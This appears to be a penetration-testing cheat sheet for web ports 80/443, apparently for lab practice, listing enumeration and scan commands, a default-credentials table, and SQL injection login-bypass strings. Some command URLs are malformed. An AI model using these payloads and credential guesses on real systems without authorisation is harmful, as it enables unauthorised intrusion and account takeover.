80/443 - HTTP(s)
First Thing I would do:
Directory busting:
dirb http:///<IP>/
Directory busting:
gobuster dir -x php,txt,xml,asp,aspx --url http://<IP>/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 404 -f
Directory busting:
ffuf -c -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
Vulnerability Scan:
nmap <IP> -p80 -script vuln -Pn
Vulnerability Scan:
nikto -host http://<IP>/
WordPress Scan:
wpscan --url http://<IP>/
While Scans are running, Try:
Try Weak Credentials, Default Login, Intercept Request in Burp, and Try Dictionary attack to crack the credentials, Try SQLi
Check the Source code if anything Juicy
If you see any CMS (Joomla, WordPress, Tomcat, etc), visit my go-to website here
Sometimes you also find creds in CMS's Github. Also, look for config files, and Readme files which can reveal sensitive info.
If you find SQLi then go here
If you find LFI/RFI then go here
If you find File Uploads then go here
Note all the usernames + keywords, sometimes cewl tool helps for cracking the password
Find exploits using keywords in the following manner: keyword poc, keyword GitHub, keyword htb, keyword hack the box
Default Creds Login Page
User | Pass |
---|---|
admin | admin |
admin | password |
admin | 1234 |
admin | 123456 |
root | toor |
test | test |
guest | guest |
anonymous | anonymous |
SQL Injection
User | Pass |
---|---|
tom | tom |
tom | ' or '1'='1 |
tom | ' or 1='1 |
tom | 1' or 1=1 -- - |
' or '1'='1 | ' or '1'='1 |
' or ' 1=1 | ' or ' 1=1 |
1' or 1=1 -- - | blah |
whatever' or '1'='1 | whatever' or '1'='1 |
Last updated